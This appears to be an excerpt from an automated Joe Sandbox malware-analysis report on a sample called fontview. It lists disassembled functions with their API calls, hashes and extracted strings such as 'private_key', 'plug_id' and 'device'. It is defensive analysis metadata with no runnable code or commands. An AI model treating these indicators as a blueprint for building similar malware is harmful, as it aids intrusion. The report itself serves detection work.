Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: d07b2b7aa13eb9e1607cb20442737d13e92e30ae166e89c69003bc223c206e31
Instruction ID: bb9a3691e4910ddf3f97fd95c6fed46118ceeaa6e102d9eb0dcd454a9ff698ef
Opcode Fuzzy Hash: d07b2b7aa13eb9e1607cb20442737d13e92e30ae166e89c69003bc223c206e31
Instruction Fuzzy Hash: 2011A739905626EFDB23EF749C4564A77D4FF002A3F128535F9489F151DF70A9408A90

Function 100174CD Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100174D2
std::_Lockit::_Lockit.LIBCPMT ref: 100174E4

Part of subcall function 10032521: __lock.LIBCMT ref: 10032532

std::exception::exception.LIBCMT ref: 1001752B

Part of subcall function 10035843: std::exception::_Copy_str.LIBCMT ref: 1003585C

__CxxThrowException@8.LIBCMT ref: 10017540

Part of subcall function 100374AB: RaiseException.KERNEL32(?,?,100324BA,?,?,?,?,?,100324BA,?,1005F454,100065DE), ref: 100374FC

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 10017549

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrow__lockstd::exception::_std::exception::exception
String ID:
API String ID: 3430881366-0
Opcode ID: d6a2380a438230f467dc9b6f5abf8cdf1449d0574d5a5743862a8377094055bd
Instruction ID: 2e25aa19e792d692cfb8a749acde735e181f8864b27ee24d0f24afe00c039543
Opcode Fuzzy Hash: d6a2380a438230f467dc9b6f5abf8cdf1449d0574d5a5743862a8377094055bd
Instruction Fuzzy Hash: 4C115EB5801B84DEC721CFA9C48058FFBF4FF18240B90892FE49AD3A01D734A649CBA5

Function 1001C0C6 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 1001C0CD

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

_rand.LIBCMT ref: 1001C0DF
_rand.LIBCMT ref: 1001C0F0
_rand.LIBCMT ref: 1001C100
_rand.LIBCMT ref: 1001C10D

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _rand$Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2467205089-0
Opcode ID: 85291bb48af480fafd9442eab0fdbe79dcb2487f13a4d34283cf0040ea608ccf
Instruction ID: 498d4cc3d495996ae9654b980ead4bc9d5abdff1964c0139d70e9de98c3e814c
Opcode Fuzzy Hash: 85291bb48af480fafd9442eab0fdbe79dcb2487f13a4d34283cf0040ea608ccf
Instruction Fuzzy Hash: 57F0B46F7C530428E112A1B66883F9B5386C7922B2F62442AFA005D0834CEBFC971171

Function 10043487 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC

__amsg_exit.LIBCMT ref: 100434B4
__lock.LIBCMT ref: 100434C4
InterlockedDecrement.KERNEL32(?), ref: 100434E1
_free.LIBCMT ref: 100434F4
InterlockedIncrement.KERNEL32(00B8A800), ref: 1004350C

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 1231874560-0
Opcode ID: 30783ecee63b859ae03d249e61e977a37b21bf0c85f4d24dd4a4fcbf5da3e8a6
Instruction ID: 1a676bcf710e47d28fb425a3ba0c93491637c3a6279d9b895e8767c0b2df3840
Opcode Fuzzy Hash: 30783ecee63b859ae03d249e61e977a37b21bf0c85f4d24dd4a4fcbf5da3e8a6
Instruction Fuzzy Hash: 4B01C835901B21DBEB12DB618842B8DB3A0FF44772F25A125E805EB6D1CB747940CBD5

Function 10029180 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 10029187

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

_rand.LIBCMT ref: 100291A0
_rand.LIBCMT ref: 100291B3
_rand.LIBCMT ref: 100291C5
_rand.LIBCMT ref: 100291D2

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _rand$Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2467205089-0
Opcode ID: c968f277d0f78b788435681ff016cffce340b1874899cb01f81134d615aae11b
Instruction ID: 49897373e2c5e09ab42bbc18d07cd4d3912f03337949244e259c9962823e8d3a
Opcode Fuzzy Hash: c968f277d0f78b788435681ff016cffce340b1874899cb01f81134d615aae11b
Instruction Fuzzy Hash: E0F0507E7853024AD311D16268C6BD72387CBD2392FD10429BE055D043CC9F7C2B6176

Function 10014268 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 154COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001426D

Strings

msg, xrefs: 10014323, 10014328, 1001433F
res, xrefs: 100142D1, 100142D6, 100142F1
data, xrefs: 100143C4, 100143DF

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: data$msg$res
API String ID: 3519838083-3980117613
Opcode ID: 639c7fa742343cc957440622c82f50c4dc46beb9c5a8af481b02dc0626dc696f
Instruction ID: ca96f964450022b4ce825e2093a35d337ed43a8c942eac252b94f1a881985688
Opcode Fuzzy Hash: 639c7fa742343cc957440622c82f50c4dc46beb9c5a8af481b02dc0626dc696f
Instruction Fuzzy Hash: 36519035800259DFDB01CFA4C891BEEB7B4EF15394F128169E81A7B191EB70BA88CB50

Function 10008570 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10008575

Strings

device, xrefs: 100085D6, 100085DB, 100085F6
plug_id, xrefs: 10008632, 1000864D
start, xrefs: 10008688, 100086A3

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: device$plug_id$start
API String ID: 3519838083-2830589257
Opcode ID: e44a6e828e21c30134f211eeb5f4d4cf6651ae1a0eb397ebc608cd26752bb1b4
Instruction ID: 61eb8341c66f9c1c37179d96dec97e96f165e86e955c115b352dda1f94a7ecc4
Opcode Fuzzy Hash: e44a6e828e21c30134f211eeb5f4d4cf6651ae1a0eb397ebc608cd26752bb1b4
Instruction Fuzzy Hash: DA415176900169DFEB01CF94C861AEE73B4FF15390F064129ED86A7159DB74BE44CB90

Function 1001320B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10013210

Strings

uid, xrefs: 1001330F, 1001332A
private_key, xrefs: 100132BA, 100132D5
res, xrefs: 10013271, 10013276, 10013291

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: private_key$res$uid
API String ID: 3519838083-3738858810
Opcode ID: cd588a721d36235ec090437caf60968450bd490db07ae58f426048e61703a1e6
Instruction ID: 0cf17efe025f2ff022da59414d9263fdb3e23aa0c70f559fd6cd2d39d45429a1
Opcode Fuzzy Hash: cd588a721d36235ec090437caf60968450bd490db07ae58f426048e61703a1e6
Instruction Fuzzy Hash: C0419D76800568EFDB01CFD9C851AEEB3B4FF05390F018129E856AB145EB70BE88CB90

Function 1000841A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000841F
_sprintf.LIBCMT ref: 10008523

Strings

device, xrefs: 10008480, 10008485, 100084A0
version, xrefs: 100084DA, 100084DF, 100084F6

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: H_prolog_sprintf
String ID: device$version
API String ID: 1907722333-3297806232
Opcode ID: c444afb1065a848e864711c5baf8a15f5b3e0c74e49889477f4c9a2eee4a49fc
Instruction ID: f25d236ea6f9278581fcfa21b551091c7206b5ca2dc78d628d144162d2d67334
Opcode Fuzzy Hash: c444afb1065a848e864711c5baf8a15f5b3e0c74e49889477f4c9a2eee4a49fc
Instruction Fuzzy Hash: 6341737680015DAFEB01CFE4C851AEE77B8FF05390F114129E945A7145D774AB88CB90

Function 1000316E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 100031D7
_memmove.LIBCMT ref: 10003202
_memmove.LIBCMT ref: 10003224

Strings

string too long, xrefs: 1000324B

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: string too long
API String ID: 4104443479-2556327735
Opcode ID: 16f67b8c74a5c08fb2015525530b7f88c27cc28432f184b8e1f740288661e490
Instruction ID: fa3cd2dc3d769f6888f7928de3acb5536cb6e3c99d1e7fc2bdd3fd91821b90be
Opcode Fuzzy Hash: 16f67b8c74a5c08fb2015525530b7f88c27cc28432f184b8e1f740288661e490
Instruction Fuzzy Hash: 66317131700700DBEB36DE58D844957B7BEEB45680B10891DE8A28B28AD771E945CB91

Function 10012342 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10012347

Part of subcall function 10008F12: __EH_prolog.LIBCMT ref: 10008F17

_free.LIBCMT ref: 10012421
_free.LIBCMT ref: 10012433

Strings

device, xrefs: 100123AE, 100123C1, 100123C2

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: H_prolog_free
String ID: device
API String ID: 271808718-154121870
Opcode ID: f3338ffb6a6534234161c5297e6b11117c421a73438d0535d4d26eb20f8d7493
Instruction ID: 8b352d68cf92191ed834dfb9f3932a70d875671965cf77d54b86c3eaa2099a4a
Opcode Fuzzy Hash: f3338ffb6a6534234161c5297e6b11117c421a73438d0535d4d26eb20f8d7493
Instruction Fuzzy Hash: 5C3159B5900258EEEB05DFA4C845BEDFBB8FF55340F50406AE0466B296DBB42F84CB60

Function 1001246D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10012472

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

Part of subcall function 10008F12: __EH_prolog.LIBCMT ref: 10008F17

_free.LIBCMT ref: 10012546
_free.LIBCMT ref: 10012558

Strings

sid, xrefs: 100124D3, 100124E6, 100124E7

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: H_prolog$_free
String ID: sid
API String ID: 2563830877-1461090996
Opcode ID: 62433c5a039936ab5b2e7decc87c0f6e068c70fff7d72867ce5ecf1aa859c82e
Instruction ID: 9d7c95b8395188239dba035838d6e92d8085a0d8a7789bfa883ebda44ad11a6c
Opcode Fuzzy Hash: 62433c5a039936ab5b2e7decc87c0f6e068c70fff7d72867ce5ecf1aa859c82e
Instruction Fuzzy Hash: A93148B5D0025CEEEB05DBA4C845BEDBBB8FF55340F10406AE04667292DBB46E84CB60

Function 10012234 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10012239

Part of subcall function 10008F12: __EH_prolog.LIBCMT ref: 10008F17

_free.LIBCMT ref: 100122FF
_free.LIBCMT ref: 10012311

Strings

uuid, xrefs: 1001228C, 1001229F, 100122A0

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: H_prolog_free
String ID: uuid
API String ID: 271808718-3514781862
Opcode ID: 1071d0dbcdb04b0911970d987590a937f9da5cd597a637b98f000c66b9ec7606
Instruction ID: 60ed96529ef6cf83be549339f636282f4e59d17fc7a14b59ad06169e53b769f5
Opcode Fuzzy Hash: 1071d0dbcdb04b0911970d987590a937f9da5cd597a637b98f000c66b9ec7606
Instruction Fuzzy Hash: 4F319EB5C00158AFEB05DFA4C845BEEBBB4FF08350F50816EE485A7291DB706E89CB90

Function 10017284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 100172DD
_sprintf.LIBCMT ref: 1001730A
_strtok.LIBCMT ref: 1001731C

Strings

%c%s, xrefs: 10017304

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _strtok$_sprintf
String ID: %c%s
API String ID: 3026970268-3720742152
Opcode ID: 5700d7e9d398f7923e82cb589ae5201eedca8beab61949594473353bbd0a817d
Instruction ID: 38263fc47139841850a4c0d857f1facff7ba69157adaf70a273bbf55d31e901d
Opcode Fuzzy Hash: 5700d7e9d398f7923e82cb589ae5201eedca8beab61949594473353bbd0a817d
Instruction Fuzzy Hash: BB11AB3A6041125BC72ACD2D9C509BEB7E8FB85266B20C11AFD88CF142DA35D98793B0

Function 10025360 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(0.0.0.0,0000003A,?,?,?,?,100224BC,?,?), ref: 1002537F
_swscanf.LIBCMT ref: 100253B9

Strings

0.0.0.0, xrefs: 1002537E, 100253B8
%d.%d.%d.%d%c, xrefs: 100253B3

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _swscanf
String ID: %d.%d.%d.%d%c$0.0.0.0
API String ID: 2748852333-3443380886
Opcode ID: 11a4e99fa972d5e1a6fe653c7a82eca1ed9a2bbf27e2babda35382efd54e40f9
Instruction ID: 25fb6b1349beb459330e93536e0f20326eda5ba292d59683b0e3ad5ee5c2430a
Opcode Fuzzy Hash: 11a4e99fa972d5e1a6fe653c7a82eca1ed9a2bbf27e2babda35382efd54e40f9
Instruction Fuzzy Hash: 20118231E001189ADB15DAA89C91BFE73ACEB09241F50456AE807E7540DA61AA048391

Function 1001F140 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(B7A91B76,B7A91B76,00000000,?,00000000,100505E8,000000FF,?,1000D70F,?,10065258,00000000,0000000F), ref: 1001F1C2
InitializeCriticalSectionAndSpinCount.KERNEL32(0000014C,00001000,?,?,?,?,?,000000FF,?,1000D70F,?,10065258,00000000,0000000F), ref: 1001F27C
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,000000FF,?,1000D70F,?,10065258,00000000,0000000F), ref: 1001F2B4
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,000000FF,?,1000D70F,?,10065258,00000000,0000000F), ref: 1001F2C4

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CreateEvent$CountCriticalInfoInitializeNativeSectionSpinSystem
String ID:
API String ID: 2029452385-0
Opcode ID: 48cc98ecf05bcf4a83353a1e2f05b4666f9f9ba61c6cc34eaeef7f0985bb3f22
Instruction ID: ef2a892a8e3a634590cf7f156d9bf4d127c5d71b8d2808cd9302d73839e031fd
Opcode Fuzzy Hash: 48cc98ecf05bcf4a83353a1e2f05b4666f9f9ba61c6cc34eaeef7f0985bb3f22
Instruction Fuzzy Hash: 4141E6B1610B56ABE314CF69C958786FBF4FB04318F50421AE5189BA90D7BAB468CFC4

Function 10027000 Relevance: 6.1, APIs: 4, Instructions: 89fileCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(?), ref: 10027090
UnmapViewOfFile.KERNEL32(?), ref: 100270B5
CloseHandle.KERNEL32(?), ref: 100270CF
CloseHandle.KERNEL32(?), ref: 100270EB

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
